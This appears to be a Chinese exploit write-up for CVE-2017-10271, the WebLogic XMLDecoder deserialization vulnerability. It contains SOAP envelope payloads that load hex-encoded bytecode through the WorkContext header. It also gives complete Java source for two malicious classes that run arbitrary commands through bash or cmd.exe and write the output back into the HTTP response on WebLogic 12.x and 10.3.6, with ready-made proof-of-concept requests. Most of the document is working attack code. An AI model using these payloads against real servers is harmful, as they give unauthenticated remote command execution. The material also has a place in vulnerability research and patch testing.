weblogicEcho&&memoryshell


字节码加载

CVE-2017-10271 是 WebLogic 的 XML 反序列化漏洞（WorkContext 头中的 `<java>` 片段按 XMLDecoder 的语法解析并执行），可用如下 poc 加载字节码：hexString 处填 class 文件的十六进制串，类名处填该字节码对应的完整类名。


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<!-- CVE-2017-10271 bytecode-loading template. The <java> fragment is in
     java.beans.XMLDecoder syntax, so each <void class=".." method=".."> below
     is a method call the server performs while "deserializing" the header. -->
<!-- hexString: the .class file as a hex string. Hex.fromHexString yields the
     byte[] that id="cls" refers to. -->
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>hexString</string>
</void>
<!-- DefiningClassLoader.defineClass(name, bytes).newInstance(): "类名" must be
     the fully-qualified name compiled into the bytes; newInstance() runs the
     no-arg constructor, which is where the payload's code starts. -->
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>类名</string>
<object idref="cls"></object>
<void method="newInstance">
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

ECHO

12

10 版本和 12 版本的回显方式不太一样：ExecuteThread.getCurrentWork() 返回的对象类型不同，拿到 response 的路径也就不同，见下文。

网上找到的 12 版本回显类，去掉其中一些会报错的代码后可以直接用了：

import java.io.InputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;
import weblogic.servlet.internal.HttpConnectionHandler;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.ServletResponseImpl;
import weblogic.servlet.internal.WebAppServletContext;
import weblogic.work.ExecuteThread;
import weblogic.work.WorkAdapter;

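public class XmlExp {
    /** Probe command: reply with the war temp path instead of running anything. */
    private static final String PATH_PROBE = "givemewlswarpath";
    /** Prefix that skips the shell wrapper; the remainder is exec'd as one argv element. */
    private static final String NO_SHELL_PREFIX = "$NO$";

    public XmlExp() {
    }

    /**
     * Runs {@code cmd} on the target and writes its combined stdout/stderr into the
     * current HTTP response (WebLogic 12.x echo).
     *
     * <p>How the response is reached: the request is serviced on an
     * {@link ExecuteThread} whose current work item is the inner class
     * {@code ContainerSupportProviderImpl$WlsRequestExecutor}; its private
     * {@code connectionHandler} field holds the {@link HttpConnectionHandler}, which
     * exposes both the servlet request and the servlet response.
     *
     * <p>Command handling: {@code givemewlswarpath} (case-insensitive) only echoes
     * {@code <war temp dir>/war/aa.txt}; a {@code $NO$} prefix execs the rest of the
     * string directly; anything else is wrapped in {@code /bin/bash -c} or
     * {@code cmd.exe /c} depending on {@code os.name}.
     *
     * <p>Build note: the class file must be loadable by the target JVM, so compile it
     * with a {@code -target} no newer than the server's Java version.
     *
     * @param cmd command to run, or the path probe
     * @throws IllegalArgumentException if {@code cmd} is null or blank
     * @throws IllegalStateException if the thread's work item is not the expected 12.x type
     * @throws Exception reflection, I/O or process-start failures
     */
    public void say(String cmd) throws Exception {
        if (cmd == null || cmd.trim().length() == 0) {
            throw new IllegalArgumentException("empty command");
        }
        ExecuteThread executeThread = (ExecuteThread) Thread.currentThread();
        WorkAdapter workAdapter = executeThread.getCurrentWork();
        if (workAdapter == null
                || !workAdapter.getClass().getName().contains("ContainerSupportProviderImpl")) {
            // Different WebLogic layout (e.g. 10.3.6, where the work item is the request
            // itself) - fail with a readable message instead of the NPE the original hit.
            throw new IllegalStateException("unexpected current work: "
                    + (workAdapter == null ? "null" : workAdapter.getClass().getName()));
        }
        Field handlerField = workAdapter.getClass().getDeclaredField("connectionHandler");
        handlerField.setAccessible(true);
        HttpConnectionHandler handler = (HttpConnectionHandler) handlerField.get(workAdapter);
        ServletResponseImpl response = handler.getServletResponse();

        if (PATH_PROBE.equalsIgnoreCase(cmd)) {
            WebAppServletContext context = handler.getServletRequest().getContext();
            response.getWriter().write(context.getRootTempDir().getAbsolutePath() + "/war/aa.txt");
            return;
        }

        // NOTE: the original also dropped a marker file (<path>x) on disk at this point;
        // removed - it contributed nothing to the echo and left an artifact behind.
        ProcessBuilder builder = new ProcessBuilder(buildCommandLine(cmd));
        builder.redirectErrorStream(true); // stderr rides along in the same stream
        Process proc = builder.start();
        InputStream output = proc.getInputStream();
        try {
            response.getServletOutputStream().writeStream(output);
        } finally {
            output.close();
        }
        proc.waitFor(); // reap the child; its output has been drained, so this should return promptly
        // Carried over from the original; presumably nudges WebLogic to commit the
        // response after the raw stream write - TODO confirm it is still needed.
        response.getWriter().write("");
    }

    /**
     * Builds the argv for {@code cmd}: {@code $NO$...} is exec'd without a shell,
     * otherwise the command is wrapped in {@code /bin/bash -c} or {@code cmd.exe /c}.
     */
    private static List<String> buildCommandLine(String cmd) {
        List<String> argv = new ArrayList<String>();
        if (cmd.startsWith(NO_SHELL_PREFIX)) {
            argv.add(cmd.substring(NO_SHELL_PREFIX.length()));
            return argv;
        }
        if (isWindows()) {
            argv.add("cmd.exe");
            argv.add("/c");
        } else {
            argv.add("/bin/bash");
            argv.add("-c");
        }
        argv.add(cmd);
        return argv;
    }

    /** True when {@code os.name} starts with "Windows" (case-insensitive, locale-independent). */
    private static boolean isWindows() {
        String osName = System.getProperty("os.name");
        // regionMatches(ignoreCase) compares per character and is not affected by the
        // default locale, unlike toLowerCase() (e.g. Turkish dotless i).
        return osName != null && osName.regionMatches(true, 0, "Windows", 0, 7);
    }
}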

测试之后确实可以

1651999295519.png

1652011291410.png

weblogic.servlet.provider.ContainerSupportProviderImpl 的内部类 WlsRequestExecutor 的 connectionHandler 属性是 HttpConnectionHandler 的实例（也就是 12 版本上 getCurrentWork() 返回的对象），上面的恶意类正是通过反射读取这个私有字段来拿到 response 的

1652010802471.png

1652010829169.png

HttpConnectionHandler可以获取response

1652000522900.png

poc

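<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<!-- Hex-encoded bytes of XmlExp.class (the 12.x echo class above), decoded into
     the byte[] bound to id="cls". -->
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>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</string>
</void>
<!-- defineClass("XmlExp", cls).newInstance().say("whoami"): the class name must
     match the one compiled into the bytes; the command output is written into
     this HTTP response by say() itself. -->
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say"><string>whoami</string></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>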

10

再去看看10版本的

貌似 10.x 系列里只有 10.3.6.0 受影响

后来看到,似乎可以直接在xml里构造回显

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<!-- Same loader chain as the template, but the class is
     com.supeream.exploits.XmlExp (a different build from the XmlExp listed
     earlier): the return value of say("whoami") is captured as id="proc", so
     this variant of say() presumably returns the process output stream instead
     of writing the response itself - verify against that class. -->
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>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</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>whoami</string>
</void>
</void>
</void>
</void>
<!-- Echo built in the XML itself: Thread.currentThread().getCurrentWork() must
     be the ServletRequestImpl for getResponse() to resolve (the 10.3.6 layout
     described below); the captured "proc" stream is copied to the response's
     output stream and flushed. -->
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

但我想让恶意类自己完成回显，这样之后遇到其他能加载字节码的利用点时可以直接复用。

按照12的思路调试之后发现10的版本回显似乎更简单

1652018316999.png

调试可见 getCurrentWork() 直接返回的就是 ServletRequestImpl，所以可以编写恶意类了

（类型转换这里先赋给 Object 再强转，看起来有点怪，应该是因为编译期 getCurrentWork() 的返回类型 WorkAdapter 不能直接转成 ServletRequestImpl；运行时对象确实是 ServletRequestImpl，所以能用）

import java.io.InputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;
import java.lang.Thread;

import weblogic.servlet.internal.HttpConnectionHandler;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.ServletResponseImpl;
import weblogic.servlet.internal.WebAppServletContext;
import weblogic.work.ExecuteThread;
import weblogic.work.WorkAdapter;

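public class XmlExp2 {
    /** Prefix that skips the shell wrapper; the remainder is exec'd as one argv element. */
    private static final String NO_SHELL_PREFIX = "$NO$";
    /** Command used when the caller passes nothing. */
    private static final String DEFAULT_CMD = "whoami";

    public XmlExp2() {
    }

    /**
     * Runs {@code cmd} on the target and writes its combined stdout/stderr into the
     * current HTTP response (WebLogic 10.3.6 echo).
     *
     * <p>On this version {@code ExecuteThread.getCurrentWork()} returns the
     * {@link ServletRequestImpl} itself (observed while debugging), so the response is
     * one {@code getResponse()} call away and no reflection is needed. The work item is
     * held as {@code Object} before the cast, apparently because the compile-time return
     * type {@link WorkAdapter} cannot be cast to {@link ServletRequestImpl} directly.
     *
     * @param cmd command to run; null/blank falls back to {@code whoami}; a {@code $NO$}
     *            prefix execs the remainder without a shell, otherwise it is wrapped in
     *            {@code /bin/bash -c} or {@code cmd.exe /c} based on {@code os.name}
     * @throws IllegalStateException if the current work item is not a ServletRequestImpl
     * @throws Exception I/O or process-start failures
     */
    public void exp(String cmd) throws Exception {
        ExecuteThread executeThread = (ExecuteThread) Thread.currentThread();
        Object work = executeThread.getCurrentWork();
        if (work == null || !work.getClass().getName().contains("ServletRequestImpl")) {
            // Other layouts (e.g. 12.x, where the work item wraps a connectionHandler) -
            // report it rather than NPE on getResponse() as the original did.
            throw new IllegalStateException("unexpected current work: "
                    + (work == null ? "null" : work.getClass().getName()));
        }
        ServletRequestImpl request = (ServletRequestImpl) work;
        ServletResponseImpl response = request.getResponse();

        String command = (cmd == null || cmd.trim().length() == 0) ? DEFAULT_CMD : cmd;
        ProcessBuilder builder = new ProcessBuilder(buildCommandLine(command));
        builder.redirectErrorStream(true); // stderr rides along in the same stream
        Process proc = builder.start();
        InputStream output = proc.getInputStream();
        try {
            response.getServletOutputStream().writeStream(output);
        } finally {
            output.close();
        }
        proc.waitFor(); // reap the child; its output has been drained, so this should return promptly
        // Carried over from the original; presumably nudges WebLogic to commit the
        // response after the raw stream write - TODO confirm it is still needed.
        response.getWriter().write("");
    }

    /**
     * Builds the argv for {@code cmd}: {@code $NO$...} is exec'd without a shell,
     * otherwise the command is wrapped in {@code /bin/bash -c} or {@code cmd.exe /c}.
     */
    private static List<String> buildCommandLine(String cmd) {
        List<String> argv = new ArrayList<String>();
        if (cmd.startsWith(NO_SHELL_PREFIX)) {
            argv.add(cmd.substring(NO_SHELL_PREFIX.length()));
            return argv;
        }
        if (isWindows()) {
            argv.add("cmd.exe");
            argv.add("/c");
        } else {
            argv.add("/bin/bash");
            argv.add("-c");
        }
        argv.add(cmd);
        return argv;
    }

    /** True when {@code os.name} starts with "Windows" (case-insensitive, locale-independent). */
    private static boolean isWindows() {
        String osName = System.getProperty("os.name");
        // regionMatches(ignoreCase) compares per character and is not affected by the
        // default locale, unlike toLowerCase() (e.g. Turkish dotless i).
        return osName != null && osName.regionMatches(true, 0, "Windows", 0, 7);
    }
}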

1652020696499.png

memoryshell